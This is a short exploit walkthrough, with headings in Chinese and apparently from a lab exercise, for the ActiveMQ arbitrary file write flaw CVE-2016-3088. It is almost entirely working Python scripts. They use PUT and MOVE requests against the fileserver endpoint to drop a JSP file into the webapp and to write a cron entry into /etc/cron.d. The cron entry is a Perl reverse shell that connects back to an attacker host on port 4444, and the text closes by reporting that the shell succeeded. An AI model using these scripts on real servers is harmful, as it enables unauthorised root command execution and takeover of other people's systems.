ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
运行脚本
import requests
url = "http://192.168.66.102:8161/fileserver/2.txt"
headers = {
"Accept": "*/*",
"Accept-Language": "en",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Connection": "close",
}
data="123"
# 发送 PUT 请求
response = requests.put(url, headers=headers, data=data)
# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)
import requests
url = "http://192.168.66.102:8161/fileserver/2.txt"
destination = "file:///opt/activemq/webapps/api/s.jsp"
headers = {
"Destination": destination,
"Host": "192.168.66.102:8161",
"Accept": "*/*",
"Accept-Language": "en",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Connection": "close",
"Content-Length": "0",
}
# 发送 MOVE 请求
response = requests.request("MOVE", url, headers=headers)
# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)
访问
反弹shell
发送命令
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
执行脚本
import requests
url = "http://192.168.66.102:8161/fileserver/1.txt"
headers = {
"Accept": "*/*",
"Accept-Language": "en",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Connection": "close",
}
data='''
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.66.133";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
'''
# 发送 PUT 请求
response = requests.put(url, headers=headers, data=data)
# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)
import requests
url = "http://192.168.66.102:8161/fileserver/1.txt"
destination = "file:///etc/cron.d/root"
headers = {
"Destination": destination,
"Host": "192.168.66.102:8161",
"Accept": "*/*",
"Accept-Language": "en",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Connection": "close",
"Content-Length": "0",
}
# 发送 MOVE 请求
response = requests.request("MOVE", url, headers=headers)
# 打印响应信息
print("Status Code:", response.status_code)
print("Response Content:", response.text)
反弹成功